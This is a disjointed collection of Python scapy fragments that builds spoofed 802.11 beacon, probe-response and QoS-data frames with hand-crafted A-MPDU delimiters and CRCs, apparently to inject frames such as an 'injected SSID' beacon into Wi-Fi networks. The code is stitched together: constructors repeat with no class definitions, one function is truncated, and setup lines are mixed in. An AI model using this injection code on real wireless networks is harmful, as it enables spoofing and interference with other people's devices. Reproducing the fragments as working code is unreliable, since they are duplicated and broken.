def get_radiotap_header(self):
radiotap_packet = RadioTap(
len=18,
present='Flags+Rate+Channel+dBm_AntSignal+Antenna',
notdecoded='\x00\x6c' + get_frequency(self.channel) +
'\xc0\x00\xc0\x01\x00\x00')
return radiotap_packet
def __init__(self, recv_mac, trans_mac, dst_mac):
self.rt = RadioTap(len=18,
present='Flags+Rate+Channel+dBm_AntSignal+Antenna',
notdecoded='\x00\x6c' + get_frequency(CHANNEL) +
'\xc0\x00\xc0\x01\x00\x00')
self.dot11hdr = Dot11(type="Data",
subtype=DOT11_SUBTYPE_DATA,
addr1=recv_mac,
addr2=trans_mac,
addr3=dst_mac,
SC=0x3060,
FCfield=0x01)
self.data = self.rt / self.dot11hdr
self.recv_mac = recv_mac
self.trans_mac = trans_mac
self.dst_mac = dst_mac
def __init__(self, recv_mac, src_mac, dst_mac, ds=0x01):
self.rt = RadioTap(len=18,
present='Flags+Rate+Channel+dBm_AntSignal+Antenna',
notdecoded='\x00\x6c' + get_frequency(CHANNEL) +
'\xc0\x00\xc0\x01\x00\x00')
self.dot11hdr = Dot11(type="Data",
subtype=DOT11_SUBTYPE_QOS_DATA,
addr1=recv_mac,
addr2=src_mac,
addr3=dst_mac,
SC=0x3060,
FCfield=ds) / Raw("\x80\x00")
self.data = self.rt / self.dot11hdr
self.num_subframes = 0
self.recv_mac = recv_mac
self.src_mac = src_mac
self.dst_mac = dst_mac
def ssid_packet():
ap_mac = '00:00:00:00:00:00'
rt = RadioTap(len=18,
present='Flags+Rate+Channel+dBm_AntSignal+Antenna',
notdecoded='\x00\x6c' + get_frequency(CHANNEL) +
'\xc0\x00\xc0\x01\x00\x00')
beacon_packet = Dot11(subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=ap_mac, addr3=ap_mac) \
/ Dot11Beacon(cap=0x2105) \
/ Dot11Elt(ID='SSID', info="injected SSID") \
/ Dot11Elt(ID='Rates', info=AP_RATES) \
/ Dot11Elt(ID='DSset', info=chr(CHANNEL))
# Update sequence number
beacon_packet.SC = 0x3060
# Update timestamp
beacon_packet[Dot11Beacon].timestamp = time.time()
mpdu_len = len(beacon_packet) + 4
if mpdu_len % 4 != 0:
padding = "\x00" * (4 - (mpdu_len % 4)) # Align to 4 octets
else:
padding = ""
mpdu_len <<= 4
crc_fun = crcmod.mkCrcFun(0b100000111, rev=True, initCrc=0x00, xorOut=0xFF)
crc = crc_fun(struct.pack('<H', mpdu_len))
maccrc = dot11crc(str(beacon_packet))
delim_sig = 0x4E
#print('a-mpdu: len %d crc %02x delim %02x' % (mpdu_len >> 4, crc, delim_sig))
#hexdump(maccrc)
ampdu_header = struct.pack('<HBB', mpdu_len, crc, delim_sig)
#hexdump(ampdu_header)
data = ampdu_header / beacon_packet / maccrc / padding
data /= "\x00\x00\x20\x4e" * 8
data = str(data)
return data
def __init__(self,
recv_mac,
src_mac,
dst_mac,
ds=0x01): # 'ds' means from/to distribution system, etc
# the next line is the original version
self.rt = RadioTap(len=18,
present='Flags+Rate+Channel+dBm_AntSignal+Antenna',
notdecoded='\x00\x6c' + get_frequency(CHANNEL) +
'\xc0\x00\xc0\x01\x00\x00')
#self.rt = RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna+MCS', notdecoded='\x00\x6c' + get_frequency(CHANNEL) + '\xc0\x00\xc0\x01\x00\x00')
self.dot11hdr = Dot11(type="Data",
subtype=DOT11_SUBTYPE_QOS_DATA,
addr1=recv_mac,
addr2=src_mac,
addr3=dst_mac,
SC=0x3060,
FCfield=ds) / Raw("\x00\x00")
self.data = self.rt # initially I only add the Radiotap header. I will add the rest of the headers later
self.num_subframes = 0
self.recv_mac = recv_mac
self.src_mac = src_mac
self.dst_mac = dst_mac
crc_fun.update(str(pkt))
crc = struct.pack('<I', crc_fun.crcValue)
return crc
interface = 'mon0'
own_mac = get_if_raw_hwaddr(interface)[1]
src_mac = own_mac
dst_mac = 'ff:ff:ff:ff:ff:ff'
#dst_mac = 'c0:ee:fb:00:00:00' # OnePlus?
#dst_mac = '00:1c:10:00:00:00' # Linksys router
src_mac = '00:1c:10:00:00:00' # Linksys router
channel = 1
sequence_number = 0
rt = RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna', notdecoded='\x00\x6c' + get_frequency(channel) + '\xc0\x00\xc0\x01\x00\x00')
def next_sc():
global sequence_number
sequence_number = (sequence_number + 1) % 4096
return sequence_number*16
# Template, xx = length
#pkt = Dot11(type=0, subtype=13, addr1=dst_mac, addr2=src_mac, addr3=src_mac, SC=0, FCfield='from-DS') \
# / "\x00\x00\x01\x26\xx\x00\x0e\x00"
# Radio measurement
# --------------------------------------------------
#pkt = Dot11(type=0, subtype=13, addr1=dst_mac, addr2=src_mac, addr3=src_mac, SC=0, FCfield=0) \
# / "\x00\x00\x01\x26\x0e\x00\x0e\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff"
def get_radiotap_header(self):
radiotap_packet = RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna', notdecoded='\x00\x6c' + get_frequency(self.channel) + '\xc0\x00\xc0\x01\x00\x00')
return radiotap_packet
def __init__(self, recv_mac, src_mac, dst_mac, ds=0x01):
self.rt = RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna', notdecoded='\x00\x6c' + get_frequency(CHANNEL) + '\xc0\x00\xc0\x01\x00\x00')
self.dot11hdr = Dot11(type="Data", subtype=DOT11_SUBTYPE_QOS_DATA, addr1=recv_mac, addr2=src_mac, addr3=dst_mac, SC=0x3060, FCfield=ds) / Raw("\x80\x00")
self.data = self.rt / self.dot11hdr
self.num_subframes = 0
self.recv_mac = recv_mac
self.src_mac = src_mac
self.dst_mac = dst_mac
def __init__(self, recv_mac, trans_mac, dst_mac):
self.rt = RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna', notdecoded='\x00\x6c' + get_frequency(CHANNEL) + '\xc0\x00\xc0\x01\x00\x00')
self.dot11hdr = Dot11(type="Data", subtype=DOT11_SUBTYPE_DATA, addr1=recv_mac, addr2=trans_mac, addr3=dst_mac, SC=0x3060, FCfield=0x01)
self.data = self.rt / self.dot11hdr
self.recv_mac = recv_mac
self.trans_mac = trans_mac
self.dst_mac = dst_mac
def probe_response():
rt = RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna', notdecoded='\x00\x6c' + get_frequency(CHANNEL) + '\xc0\x00\xc0\x01\x00\x00')
beacon_packet = Dot11(subtype=5, addr1='ff:ff:ff:ff:ff:ff', addr2="be:da:de:ad:be:ef", addr3="be:da:de:ad:be:ef", SC=0x3060) \
/ Dot11ProbeResp(timestamp=time.time(), beacon_interval=0x0064, cap=0x2104) \
/ Dot11Elt(ID='SSID', info="injected SSID") \
/ Dot11Elt(ID='Rates', info=AP_RATES) \
/ Dot11Elt(ID='DSset', info=chr(1))
# Update sequence number
beacon_packet.SC = 0x3060
mpdu_len = len(beacon_packet) + 4
if mpdu_len % 4 != 0:
padding = "\x00" * (4 - (mpdu_len % 4)) # Align to 4 octets
else:
padding = ""
mpdu_len <<= 4
crc_fun = crcmod.mkCrcFun(0b100000111, rev=True, initCrc=0x00, xorOut=0xFF)
crc = crc_fun(struct.pack('<H', mpdu_len))
maccrc = dot11crc(str(beacon_packet))
delim_sig = 0x4E
#print('a-mpdu: len %d crc %02x delim %02x' % (mpdu_len >> 4, crc, delim_sig))
#hexdump(maccrc)
ampdu_header = struct.pack('<HBB', mpdu_len, crc, delim_sig)
#hexdump(ampdu_header)
data = ampdu_header / beacon_packet / maccrc / padding
data /= "\x00\x00\x20\x4e" * 8
data = str(data)
return data
